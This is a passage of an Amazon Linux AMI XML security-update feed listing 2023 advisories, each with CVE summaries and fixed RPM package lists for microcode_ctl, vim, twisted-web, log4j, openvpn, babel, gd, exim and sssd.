Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-38090:
Improper isolation of shared resources in some Intel(R) Processors when using Intel(R) Software Guard Extensions may allow a privileged user to potentially enable information disclosure via local access.
CVE-2022-33196:
Incorrect default permissions in some memory controller configurations for some Intel(R) Xeon(R) Processors when using Intel(R) Software Guard Extensions which may allow a privileged user to potentially enable escalation of privilege via local access.
CVE-2022-21216:
Insufficient granularity of access control in out-of-band management in some Intel(R) Atom and Intel Xeon Scalable Processors may allow a privileged user to potentially enable escalation of privilege via adjacent network access.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21216" title="" id="CVE-2022-21216" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-33196" title="" id="CVE-2022-33196" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38090" title="" id="CVE-2022-38090" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="microcode_ctl-debuginfo" version="2.1" release="47.41.amzn1" epoch="2" arch="x86_64"><filename>Packages/microcode_ctl-debuginfo-2.1-47.41.amzn1.x86_64.rpm</filename></package><package name="microcode_ctl" version="2.1" release="47.41.amzn1" epoch="2" arch="x86_64"><filename>Packages/microcode_ctl-2.1-47.41.amzn1.x86_64.rpm</filename></package><package name="microcode_ctl-debuginfo" version="2.1" release="47.41.amzn1" epoch="2" arch="i686"><filename>Packages/microcode_ctl-debuginfo-2.1-47.41.amzn1.i686.rpm</filename></package><package name="microcode_ctl" version="2.1" release="47.41.amzn1" epoch="2" arch="i686"><filename>Packages/microcode_ctl-2.1-47.41.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1716</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1716: important priority package update for vim</title><issued date="2023-03-30 22:50:00" /><updated date="2023-04-05 20:24:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-1355:
NULL Pointer Dereference in GitHub repository vim/vim prior to 9.0.1402.
CVE-2023-1264:
NULL Pointer Dereference in GitHub repository vim/vim prior to 9.0.1392.
CVE-2023-1175:
Incorrect Calculation of Buffer Size in GitHub repository vim/vim prior to 9.0.1378.
CVE-2023-1170:
A heap-based buffer overflow vulnerability was found in GitHub repository vim/vim prior to 9.0.1376 in Vim's utf_ptr2char() function of the src/mbyte.c file. This flaw occurs because there is access to invalid memory with put in visual block mode. An attacker can trick a user into opening a specially crafted file, triggering an out-of-bounds read that causes an application to crash, leading to a denial of service.
CVE-2023-0054:
Out-of-bounds Write in GitHub repository vim/vim prior to 9.0.1145.
CVE-2023-0051:
Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.1144.
CVE-2022-47024:
A null pointer dereference issue was discovered in function gui_x11_create_blank_mouse in gui_x11.c in vim 8.1.2269 thru 9.0.0339 allows attackers to cause denial of service or other unspecified impacts.
CVE-2022-3491:
Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.0742.
CVE-2022-3324:
Stack-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.0598.
CVE-2022-3256:
Use After Free in GitHub repository vim/vim prior to 9.0.0530.
CVE-2022-3016:
A heap use-after-free vulnerability was found in vim's get_next_valid_entry() function of the src/quickfix.c file. The issue occurs because vim is using freed memory when the location list is changed in autocmd. This flaw allows an attacker to trick a user into opening a specially crafted file, triggering a heap use-after-free that causes an application to crash, possibly executing code and corrupting memory.
CVE-2022-2982:
A heap use-after-free vulnerability was found in vim's qf_fill_buffer() function of the src/quickfix.c file. The issue occurs because vim uses freed memory when recursively using 'quickfixtextfunc.' This flaw allows an attacker to trick a user into opening a specially crafted file, triggering a heap use-after-free that causes an application to crash, possibly executing code and corrupting memory.
CVE-2022-2862:
Use After Free in GitHub repository vim/vim prior to 9.0.0221.
CVE-2022-2849:
Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.0220.
CVE-2022-2522:
A heap buffer overflow vulnerability was found in vim's ins_compl_infercase_gettext() function of the src/insexpand.c file. This flaw occurs when vim tries to access uninitialized memory when completing a long line. This flaw allows an attacker to trick a user into opening a specially crafted file, triggering a heap-based buffer overflow that causes an application to crash, possibly executing code and corrupting memory.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2522" title="" id="CVE-2022-2522" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2849" title="" id="CVE-2022-2849" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2862" title="" id="CVE-2022-2862" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2982" title="" id="CVE-2022-2982" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3016" title="" id="CVE-2022-3016" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3256" title="" id="CVE-2022-3256" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3324" title="" id="CVE-2022-3324" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3491" title="" id="CVE-2022-3491" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-47024" title="" id="CVE-2022-47024" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0051" title="" id="CVE-2023-0051" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0054" title="" id="CVE-2023-0054" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1170" title="" id="CVE-2023-1170" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1175" title="" id="CVE-2023-1175" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1264" title="" id="CVE-2023-1264" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1355" title="" id="CVE-2023-1355" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="vim-filesystem" version="9.0.1403" release="1.76.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-filesystem-9.0.1403-1.76.amzn1.noarch.rpm</filename></package><package name="vim-enhanced" version="9.0.1403" release="1.76.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-enhanced-9.0.1403-1.76.amzn1.x86_64.rpm</filename></package><package name="vim-minimal" version="9.0.1403" release="1.76.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-minimal-9.0.1403-1.76.amzn1.x86_64.rpm</filename></package><package name="vim-common" version="9.0.1403" release="1.76.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-common-9.0.1403-1.76.amzn1.x86_64.rpm</filename></package><package name="vim-debuginfo" version="9.0.1403" release="1.76.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-debuginfo-9.0.1403-1.76.amzn1.x86_64.rpm</filename></package><package name="vim-data" version="9.0.1403" release="1.76.amzn1" epoch="2" arch="noarch"><filename>Packages/vim-data-9.0.1403-1.76.amzn1.noarch.rpm</filename></package><package name="vim-common" version="9.0.1403" release="1.76.amzn1" epoch="2" arch="i686"><filename>Packages/vim-common-9.0.1403-1.76.amzn1.i686.rpm</filename></package><package name="vim-enhanced" version="9.0.1403" release="1.76.amzn1" epoch="2" arch="i686"><filename>Packages/vim-enhanced-9.0.1403-1.76.amzn1.i686.rpm</filename></package><package name="vim-minimal" version="9.0.1403" release="1.76.amzn1" epoch="2" arch="i686"><filename>Packages/vim-minimal-9.0.1403-1.76.amzn1.i686.rpm</filename></package><package name="vim-debuginfo" version="9.0.1403" release="1.76.amzn1" epoch="2" arch="i686"><filename>Packages/vim-debuginfo-9.0.1403-1.76.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1717</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1717: important priority package update for python-twisted-web</title><issued date="2023-03-30 22:50:00" /><updated date="2023-04-05 20:24:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-39348:
Twisted is an event-based framework for internet applications. Started with version 0.9.4, when the host header does not match a configured host `twisted.web.vhost.NameVirtualHost` will return a `NoResource` resource which renders the Host header unescaped into the 404 response allowing HTML and script injection. In practice this should be very difficult to exploit as being able to modify the Host header of a normal HTTP request implies that one is already in a privileged position. This issue was fixed in version 22.10.0rc1. There are no known workarounds.
CVE-2022-24801:
A flaw was found in python-twisted. This vulnerability occurs due to the parsing of illegal constructs in the twisted.web.http module. The illegal constructs include '+/-' in the Content-Length header, '\n and \t' etc. Non-conformant parsing leads to a desync if requests pass through multiple HTTP parsers. This flaw allows a remote attacker to perform an HTTP request smuggling attack.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24801" title="" id="CVE-2022-24801" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-39348" title="" id="CVE-2022-39348" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python26-twisted-web" version="8.2.0" release="6.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-twisted-web-8.2.0-6.8.amzn1.x86_64.rpm</filename></package><package name="python27-twisted-web" version="8.2.0" release="6.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-twisted-web-8.2.0-6.8.amzn1.x86_64.rpm</filename></package><package name="python26-twisted-web" version="8.2.0" release="6.8.amzn1" epoch="0" arch="i686"><filename>Packages/python26-twisted-web-8.2.0-6.8.amzn1.i686.rpm</filename></package><package name="python27-twisted-web" version="8.2.0" release="6.8.amzn1" epoch="0" arch="i686"><filename>Packages/python27-twisted-web-8.2.0-6.8.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1718</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1718: important priority package update for log4j</title><issued date="2023-03-30 22:50:00" /><updated date="2023-04-05 20:23:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-23307:
A flaw was found in the log4j 1.x chainsaw component, where the contents of certain log entries are deserialized and possibly permit code execution. This flaw allows an attacker to send a malicious request with serialized data to the server to be deserialized when the chainsaw component is run.
CVE-2022-23305:
A flaw was found in the Java logging library Apache Log4j in version 1.x. JDBCAppender in Log4j 1.x is vulnerable to SQL injection in untrusted data. This allows a remote attacker to run SQL statements in the database if the deployed application is configured to use JDBCAppender with certain interpolation tokens.
CVE-2022-23302:
A flaw was found in the Java logging library Apache Log4j in version 1.x. JMSSink in Log4j 1.x is vulnerable to deserialization of untrusted data. This allows a remote attacker to execute code on the server if JMSSink is deployed and has been configured to perform JNDI requests.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23302" title="" id="CVE-2022-23302" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23305" title="" id="CVE-2022-23305" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23307" title="" id="CVE-2022-23307" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="log4j" version="1.2.17" release="16.14.amzn1" epoch="0" arch="noarch"><filename>Packages/log4j-1.2.17-16.14.amzn1.noarch.rpm</filename></package><package name="log4j-javadoc" version="1.2.17" release="16.14.amzn1" epoch="0" arch="noarch"><filename>Packages/log4j-javadoc-1.2.17-16.14.amzn1.noarch.rpm</filename></package><package name="log4j-manual" version="1.2.17" release="16.14.amzn1" epoch="0" arch="noarch"><filename>Packages/log4j-manual-1.2.17-16.14.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1719</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1719: low priority package update for openvpn</title><issued date="2023-03-30 22:50:00" /><updated date="2023-04-05 20:23:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-0547:
OpenVPN 2.1 until v2.4.12 and v2.5.6 may enable authentication bypass in external authentication plug-ins when more than one of them makes use of deferred authentication replies, which allows an external user to be granted access with only partially correct credentials.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0547" title="" id="CVE-2022-0547" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openvpn-devel" version="2.4.12" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/openvpn-devel-2.4.12-1.43.amzn1.x86_64.rpm</filename></package><package name="openvpn-debuginfo" version="2.4.12" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/openvpn-debuginfo-2.4.12-1.43.amzn1.x86_64.rpm</filename></package><package name="openvpn" version="2.4.12" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/openvpn-2.4.12-1.43.amzn1.x86_64.rpm</filename></package><package name="openvpn-devel" version="2.4.12" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/openvpn-devel-2.4.12-1.43.amzn1.i686.rpm</filename></package><package name="openvpn" version="2.4.12" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/openvpn-2.4.12-1.43.amzn1.i686.rpm</filename></package><package name="openvpn-debuginfo" version="2.4.12" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/openvpn-debuginfo-2.4.12-1.43.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1720</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1720: medium priority package update for python-babel</title><issued date="2023-03-30 22:50:00" /><updated date="2023-04-05 20:23:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-42771:
Babel.Locale in Babel before 2.9.1 allows attackers to load arbitrary locale .dat files (containing serialized Python objects) via directory traversal, leading to code execution.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42771" title="" id="CVE-2021-42771" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27-babel" version="0.9.4" release="5.1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/python27-babel-0.9.4-5.1.9.amzn1.noarch.rpm</filename></package><package name="python26-babel" version="0.9.4" release="5.1.9.amzn1" epoch="0" arch="noarch"><filename>Packages/python26-babel-0.9.4-5.1.9.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1721</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1721: important priority package update for gd</title><issued date="2023-03-30 22:50:00" /><updated date="2023-04-05 20:23:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-40145:
** DISPUTED ** gdImageGd2Ptr in gd_gd2.c in the GD Graphics Library (aka LibGD) through 2.3.2 has a double free. NOTE: the vendor's position is "The GD2 image format is a proprietary image format of libgd. It has to be regarded as being obsolete, and should only be used for development and testing purposes."
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40145" title="" id="CVE-2021-40145" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="gd-devel" version="2.0.35" release="11.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/gd-devel-2.0.35-11.11.amzn1.x86_64.rpm</filename></package><package name="gd" version="2.0.35" release="11.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/gd-2.0.35-11.11.amzn1.x86_64.rpm</filename></package><package name="gd-progs" version="2.0.35" release="11.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/gd-progs-2.0.35-11.11.amzn1.x86_64.rpm</filename></package><package name="gd-debuginfo" version="2.0.35" release="11.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/gd-debuginfo-2.0.35-11.11.amzn1.x86_64.rpm</filename></package><package name="gd-devel" version="2.0.35" release="11.11.amzn1" epoch="0" arch="i686"><filename>Packages/gd-devel-2.0.35-11.11.amzn1.i686.rpm</filename></package><package name="gd" version="2.0.35" release="11.11.amzn1" epoch="0" arch="i686"><filename>Packages/gd-2.0.35-11.11.amzn1.i686.rpm</filename></package><package name="gd-progs" version="2.0.35" release="11.11.amzn1" epoch="0" arch="i686"><filename>Packages/gd-progs-2.0.35-11.11.amzn1.i686.rpm</filename></package><package name="gd-debuginfo" version="2.0.35" release="11.11.amzn1" epoch="0" arch="i686"><filename>Packages/gd-debuginfo-2.0.35-11.11.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1722</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1722: important priority package update for exim</title><issued date="2023-03-30 22:50:00" /><updated date="2023-04-05 20:23:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-38371:
The STARTTLS feature in Exim through 4.94.2 allows response injection (buffering) during MTA SMTP sending.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38371" title="" id="CVE-2021-38371" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="exim-greylist" version="4.92" release="1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-greylist-4.92-1.36.amzn1.x86_64.rpm</filename></package><package name="exim-mysql" version="4.92" release="1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mysql-4.92-1.36.amzn1.x86_64.rpm</filename></package><package name="exim-mon" version="4.92" release="1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mon-4.92-1.36.amzn1.x86_64.rpm</filename></package><package name="exim-pgsql" version="4.92" release="1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-pgsql-4.92-1.36.amzn1.x86_64.rpm</filename></package><package name="exim" version="4.92" release="1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-4.92-1.36.amzn1.x86_64.rpm</filename></package><package name="exim-debuginfo" version="4.92" release="1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-debuginfo-4.92-1.36.amzn1.x86_64.rpm</filename></package><package name="exim-debuginfo" version="4.92" release="1.36.amzn1" epoch="0" arch="i686"><filename>Packages/exim-debuginfo-4.92-1.36.amzn1.i686.rpm</filename></package><package name="exim-mysql" version="4.92" release="1.36.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mysql-4.92-1.36.amzn1.i686.rpm</filename></package><package name="exim-mon" version="4.92" release="1.36.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mon-4.92-1.36.amzn1.i686.rpm</filename></package><package name="exim-greylist" version="4.92" release="1.36.amzn1" epoch="0" arch="i686"><filename>Packages/exim-greylist-4.92-1.36.amzn1.i686.rpm</filename></package><package name="exim" version="4.92" release="1.36.amzn1" epoch="0" arch="i686"><filename>Packages/exim-4.92-1.36.amzn1.i686.rpm</filename></package><package name="exim-pgsql" version="4.92" release="1.36.amzn1" epoch="0" arch="i686"><filename>Packages/exim-pgsql-4.92-1.36.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1723</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1723: important priority package update for sssd</title><issued date="2023-03-30 22:50:00" /><updated date="2023-04-05 20:23:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-4254:
A vulnerability was found in SSSD, in the libsss_certmap functionality. PKINIT enables a client to authenticate to the KDC using an X.509 certificate and the corresponding private key, rather than a passphrase or keytab. FreeIPA uses mapping rules to map a certificate presented during a PKINIT authentication request to the corresponding principal. The mapping filter is vulnerable to LDAP filter injection. The search result can be influenced by values in the certificate, which may be attacker controlled. In the most extreme case, an attacker could gain control of the admin account, leading to full domain takeover.
CVE-2021-3621:
A flaw was found in SSSD, where the sssctl command was vulnerable to shell command injection via the logs-fetch and cache-expire subcommands. This flaw allows an attacker to trick the root user into running a specially crafted sssctl command, such as via sudo, to gain root access. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3621" title="" id="CVE-2021-3621" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4254" title="" id="CVE-2022-4254" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libsss_autofs" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_autofs-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="sssd-krb5-common" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-krb5-common-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="sssd-winbind-idmap" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-winbind-idmap-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="libsss_simpleifp" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_simpleifp-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="sssd-common" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-common-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="sssd-dbus" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-dbus-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="python27-libsss_nss_idmap" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libsss_nss_idmap-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="libsss_nss_idmap" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_nss_idmap-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="libsss_idmap-devel" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_idmap-devel-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="sssd-common-pac" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-common-pac-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="libsss_nss_idmap-devel" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_nss_idmap-devel-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="libsss_certmap-devel" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_certmap-devel-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="libipa_hbac" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/libipa_hbac-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="libsss_certmap" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_certmap-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="python27-sss-murmur" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-sss-murmur-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="libsss_sudo" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_sudo-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="libsss_idmap" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_idmap-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="sssd-client" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-client-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="sssd-tools" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-tools-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="python27-sssdconfig" version="1.16.4" release="21.27.amzn1" epoch="0" arch="noarch"><filename>Packages/python27-sssdconfig-1.16.4-21.27.amzn1.noarch.rpm</filename></package><package name="sssd-proxy" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-proxy-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="sssd" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="python27-libipa_hbac" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libipa_hbac-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="libsss_simpleifp-devel" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsss_simpleifp-devel-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="sssd-libwbclient-devel" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-libwbclient-devel-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="sssd-debuginfo" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-debuginfo-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="sssd-krb5" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-krb5-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="sssd-ipa" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-ipa-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="sssd-ldap" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-ldap-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="python27-sss" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-sss-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="sssd-libwbclient" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-libwbclient-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="libipa_hbac-devel" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/libipa_hbac-devel-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="sssd-ad" version="1.16.4" release="21.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/sssd-ad-1.16.4-21.27.amzn1.x86_64.rpm</filename></package><package name="sssd-tools" version="1.16.4" release="21.27.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-tools-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="libsss_simpleifp-devel" version="1.16.4" release="21.27.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_simpleifp-devel-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="python27-sss" version="1.16.4" release="21.27.amzn1" epoch="0" arch="i686"><filename>Packages/python27-sss-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="sssd-ipa" version="1.16.4" release="21.27.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-ipa-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="sssd-libwbclient-devel" version="1.16.4" release="21.27.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-libwbclient-devel-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="libsss_idmap" version="1.16.4" release="21.27.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_idmap-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="libsss_nss_idmap" version="1.16.4" release="21.27.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_nss_idmap-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="libsss_certmap" version="1.16.4" release="21.27.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_certmap-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="sssd-client" version="1.16.4" release="21.27.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-client-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="sssd-common" version="1.16.4" release="21.27.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-common-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="libipa_hbac-devel" version="1.16.4" release="21.27.amzn1" epoch="0" arch="i686"><filename>Packages/libipa_hbac-devel-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="sssd-krb5" version="1.16.4" release="21.27.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-krb5-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="libsss_autofs" version="1.16.4" release="21.27.amzn1" epoch="0" arch="i686"><filename>Packages/libsss_autofs-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="sssd-common-pac" version="1.16.4" release="21.27.amzn1" epoch="0" arch="i686"><filename>Packages/sssd-common-pac-1.16.4-21.27.amzn1.i686.rpm</filename></package><package name="sssd" version="1.16.4" release="21.27.amzn1" epoch="0" 